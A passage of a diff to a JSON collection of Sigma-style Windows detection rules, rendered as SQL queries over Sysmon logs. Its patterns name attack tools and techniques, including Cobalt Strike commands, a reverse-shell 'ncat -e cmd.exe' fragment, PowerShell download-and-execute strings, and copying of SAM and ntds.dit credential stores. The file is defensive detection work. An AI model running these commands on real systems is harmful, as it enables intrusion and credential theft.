'\\' AND CommandLine LIKE '%interactive%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_manageengine_pattern.yml" + "filename": 
"proc_creation_win_at_interactive_execution.yml" }, { - "title": "PsExec Service Child Process Execution as LOCAL SYSTEM", - "id": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", + "title": "Operator Bloopers Cobalt Strike Modules", + "id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", "status": "experimental", - "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%zerologon%' ESCAPE '\\' OR CommandLine LIKE '%av\\_query%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml" + "filename": 
"proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" }, { - "title": "HackTool - CrackMapExec Execution Patterns", - "id": "058f4380-962d-40a5-afce-50207d36d7e2", - "status": "stable", - "description": "Detects various execution patterns of the CrackMapExec pentesting framework", - "author": "Thomas Patzke", + "title": "PUA - Nmap/Zenmap Execution", + "id": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", + "status": "test", + "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1053", - "attack.t1059.003", - "attack.t1059.001", - "attack.s0106" + "attack.discovery", + "attack.t1046" ], "falsepositives": [ - "Unknown" + "Network administrator computer" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%cmd.exe /Q /c % 1> \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > %\\\\Temp\\\\% 2>&1' ESCAPE '\\') AND (CommandLine LIKE '%powershell.exe -exec bypass -noni -nop -w 1 -C \"%' ESCAPE '\\' OR CommandLine LIKE '%powershell.exe -noni -nop -w 1 -enc %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\nmap.exe' ESCAPE '\\' OR Image LIKE '%\\\\zennmap.exe' ESCAPE '\\') OR OriginalFileName IN ('nmap.exe', 'zennmap.exe')))" ], - "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml" + "filename": "proc_creation_win_pua_nmap_zenmap.yml" }, { - "title": "Suspicious Encoded Obfuscated LOAD String", - "id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", - "status": "test", - "description": "Detects suspicious base64 encoded and obbfuscated LOAD string often used for 
reflection.assembly load", - "author": "pH-T (Nextron Systems)", + "title": "HackTool - GMER Rootkit Detector and Remover Execution", + "id": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", + "status": "experimental", + "description": "Detects the execution GMER tool based on image and hash fields.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.defense_evasion" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvACIAKwAiAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvAGEAIgArACIAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvACcAKwAnAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvAGEAJwArACcAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\gmer.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=E9DC058440D321AA17D0600B3CA0AB04%' ESCAPE '\\' OR Hashes LIKE '%SHA1=539C228B6B332F5AA523E5CE358C16647D8BBE57%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173%' ESCAPE '\\') OR md5 = 'e9dc058440d321aa17d0600b3ca0ab04' OR sha1 = '539c228b6b332f5aa523e5ce358c16647d8bbe57' OR sha256 = 'e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173'))" ], - "filename": "proc_creation_win_powershell_base64_load.yml" + "filename": "proc_creation_win_hktl_gmer.yml" }, { - "title": "Adwind RAT / JRAT", - "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", - "status": "test", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "title": "PUA - Rclone Execution", + "id": "e37db05d-d1f9-49c8-b464-cee1a4b11638", + "status": "experimental", + "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", + "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.exfiltration", + "attack.t1567.002" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Oracle%' ESCAPE '\\' AND CommandLine LIKE '%\\\\java%' ESCAPE '\\' AND CommandLine LIKE '%.exe %' ESCAPE '\\') OR (CommandLine LIKE '%cscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%Retrive%' ESCAPE '\\' AND CommandLine LIKE '%.vbs %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%--config %' ESCAPE '\\' AND 
CommandLine LIKE '%--no-check-certificate %' ESCAPE '\\' AND CommandLine LIKE '% copy %' ESCAPE '\\') OR ((Image LIKE '%\\\\rclone.exe' ESCAPE '\\' OR Description = 'Rsync for cloud storage') AND (CommandLine LIKE '%pass%' ESCAPE '\\' OR CommandLine LIKE '%user%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%sync%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\' OR CommandLine LIKE '%lsd%' ESCAPE '\\' OR CommandLine LIKE '%remote%' ESCAPE '\\' OR CommandLine LIKE '%ls%' ESCAPE '\\' OR CommandLine LIKE '%mega%' ESCAPE '\\' OR CommandLine LIKE '%pcloud%' ESCAPE '\\' OR CommandLine LIKE '%ftp%' ESCAPE '\\' OR CommandLine LIKE '%ignore-existing%' ESCAPE '\\' OR CommandLine LIKE '%auto-confirm%' ESCAPE '\\' OR CommandLine LIKE '%transfers%' ESCAPE '\\' OR CommandLine LIKE '%multi-thread-streams%' ESCAPE '\\' OR CommandLine LIKE '%no-check-certificate %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_malware_adwind.yml" + "filename": "proc_creation_win_pua_rclone_execution.yml" }, { - "title": "Bypass UAC via Fodhelper.exe", - "id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", - "status": "test", - "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "title": "Potential Russian APT Credential Theft Activity", + "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", + "status": "stable", + "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ - "Legitimate use of fodhelper.exe utility by legitimate user" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\fodhelper.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%xcopy /S /E /C /Q /H \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%adexplorer -snapshot \"\" c:\\\\users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\downloads\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.snp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_fodhelper.yml" + "filename": "proc_creation_win_apt_bear_activity_gtr19.yml" }, { - "title": "Potential PowerShell Execution Policy Tampering - ProcCreation", - "id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", + "title": "RunDLL32 Spawning Explorer", + "id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", "status": "experimental", - "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", + "author": "elhoim, 
CD_ROM_", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy%' ESCAPE '\\') AND (CommandLine LIKE '%Bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\' OR CommandLine LIKE '%Unrestricted%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (ParentCommandLine LIKE '%\\\\shell32.dll,Control\\_RunDLL%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml" + "filename": "proc_creation_win_rundll32_spawn_explorer.yml" }, { - "title": "HackTool - KrbRelay Execution", - "id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", + "title": "Mstsc.EXE Execution From Uncommon Parent", + "id": "ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6", "status": "experimental", - "description": "Detects the use of KrbRelay, a Kerberos relaying tool", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.lateral_movement" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\KrbRelay.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelay.exe') OR (CommandLine LIKE '% -spn %' ESCAPE '\\' AND CommandLine LIKE '% -clsid %' ESCAPE '\\' AND CommandLine 
LIKE '% -rbcd %' ESCAPE '\\') OR (CommandLine LIKE '%shadowcred%' ESCAPE '\\' AND CommandLine LIKE '%clsid%' ESCAPE '\\' AND CommandLine LIKE '%spn%' ESCAPE '\\') OR (CommandLine LIKE '%spn %' ESCAPE '\\' AND CommandLine LIKE '%session %' ESCAPE '\\' AND CommandLine LIKE '%clsid %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\brave.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\CCleanerBrowser.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\chromium.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\msedge.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\opera.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\whale.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\') AND (Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe'))" ], - "filename": "proc_creation_win_hktl_krbrelay.yml" + "filename": "proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml" }, { - "title": "Copying Sensitive Files with Credential Data", - "id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", - "status": "test", - "description": "Files with well-known filenames (sensitive files with credential data) copying", - "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", + "id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", + "status": "experimental", + "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. 
This can be used to override access restrictions set by previous ACLs.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003", - "car.2013-07-001", - "attack.s0404" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ - "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\esentutl.exe' ESCAPE '\\') AND (CommandLine LIKE '%vss%' ESCAPE '\\' OR CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% /y %' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\system %' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\security%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%A;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_esentutl_sensitive_file_copy.yml" + "filename": 
"proc_creation_win_sc_sdset_allow_service_changes.yml" }, { - "title": "Greenbug Espionage Group Indicators", - "id": "3711eee4-a808-4849-8a14-faf733da3612", - "status": "test", - "description": "Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec", - "author": "Florian Roth (Nextron Systems)", + "title": "PUA - CleanWipe Execution", + "id": "f44800ac-38ec-471f-936e-3fa7d9c53100", + "status": "experimental", + "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.g0049", - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1105", "attack.defense_evasion", - "attack.t1036.005" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Legitimate administrative use (Should be investigated either way)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%:\\\\ProgramData\\\\adobe\\\\Adobe.exe' ESCAPE '\\' OR Image LIKE '%:\\\\ProgramData\\\\oracle\\\\local.exe' ESCAPE '\\' OR Image LIKE '%\\\\revshell.exe' ESCAPE '\\' OR Image LIKE '%\\\\infopagesbackup\\\\ncat.exe' ESCAPE '\\' OR Image LIKE '%:\\\\ProgramData\\\\comms\\\\comms.exe' ESCAPE '\\') OR (CommandLine LIKE '%-ExecutionPolicy Bypass -File%' ESCAPE '\\' AND CommandLine LIKE '%\\\\msf.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%infopagesbackup%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ncat%' ESCAPE '\\' AND CommandLine LIKE '%-e cmd.exe%' ESCAPE '\\') OR (CommandLine LIKE '%system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill%' ESCAPE '\\' OR CommandLine LIKE '%-nop -w hidden -c $k=new-object%' ESCAPE '\\' OR CommandLine LIKE '%[Net.CredentialCache]::DefaultCredentials;IEX %' ESCAPE '\\' OR CommandLine LIKE '% -nop -w hidden -c $m=new-object net.webclient;$m%' ESCAPE '\\' OR CommandLine 
LIKE '%-noninteractive -executionpolicy bypass whoami%' ESCAPE '\\' OR CommandLine LIKE '%-noninteractive -executionpolicy bypass netstat -a%' ESCAPE '\\') OR CommandLine LIKE '%L3NlcnZlcj1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SepRemovalToolNative\\_x64.exe' ESCAPE '\\' OR (Image LIKE '%\\\\CATClean.exe' ESCAPE '\\' AND CommandLine LIKE '%--uninstall%' ESCAPE '\\') OR (Image LIKE '%\\\\NetInstaller.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR (Image LIKE '%\\\\WFPUnins.exe' ESCAPE '\\' AND CommandLine LIKE '%/uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/enterprise%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_greenbug_may20.yml" + "filename": "proc_creation_win_pua_cleanwipe.yml" }, { - "title": "Potential Privilege Escalation To LOCAL SYSTEM", - "id": "207b0396-3689-42d9-8399-4222658efc99", + "title": "Potential CVE-2023-21554 QueueJumper Exploitation", + "id": "53207cc2-0745-4c19-bc72-80be1cc16b3f", "status": "experimental", - "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.resource_development", - "attack.t1587.001" - ], + "description": "Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ - "Weird admins that rename their tools", - "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR 
CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%PsExec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Windows\\\\System32\\\\mqsvc.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' 
ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml" + "filename": "proc_creation_win_exploit_cve_2023_21554_queuejumper.yml" }, { - "title": "PowerShell Web Download and Execution", - "id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", - "status": "experimental", - "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", - "author": "Florian Roth (Nextron Systems)", + "title": "Adwind RAT / JRAT", + "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", + "status": "test", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "attack.t1059" - ], - "falsepositives": [ - "Scripts or tools that download files and execute them" + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\') AND (CommandLine LIKE '%IEX(%' ESCAPE '\\' OR CommandLine LIKE '%IEX (%' ESCAPE '\\' OR CommandLine LIKE '%I`EX%' ESCAPE '\\' OR CommandLine LIKE '%IE`X%' ESCAPE '\\' OR CommandLine LIKE '%I`E`X%' ESCAPE '\\' OR CommandLine LIKE '%| IEX%' ESCAPE '\\' OR CommandLine LIKE '%|IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%;iex $%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Oracle%' ESCAPE '\\' AND CommandLine LIKE '%\\\\java%' ESCAPE '\\' AND 
CommandLine LIKE '%.exe %' ESCAPE '\\') OR (CommandLine LIKE '%cscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%Retrive%' ESCAPE '\\' AND CommandLine LIKE '%.vbs %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_download_iex.yml" + "filename": "proc_creation_win_malware_adwind.yml" }, { - "title": "PUA - DIT Snapshot Viewer", - "id": "d3b70aad-097e-409c-9df2-450f80dc476b", - "status": "test", - "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", - "author": "Furkan Caliskan (@caliskanfurkan_)", - "tags": [ - "attack.credential_access", - "attack.t1003.003" - ], + "title": "Uncommon One Time Only Scheduled Task At 00:00", + "id": "970823b7-273b-460a-8afc-3a6811998529", + "status": "experimental", + "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", + "author": "pH-T (Nextron Systems)", "falsepositives": [ - "Legitimate admin usage" + "Software installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ditsnap.exe' ESCAPE '\\' OR CommandLine LIKE '%ditsnap.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe%' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR 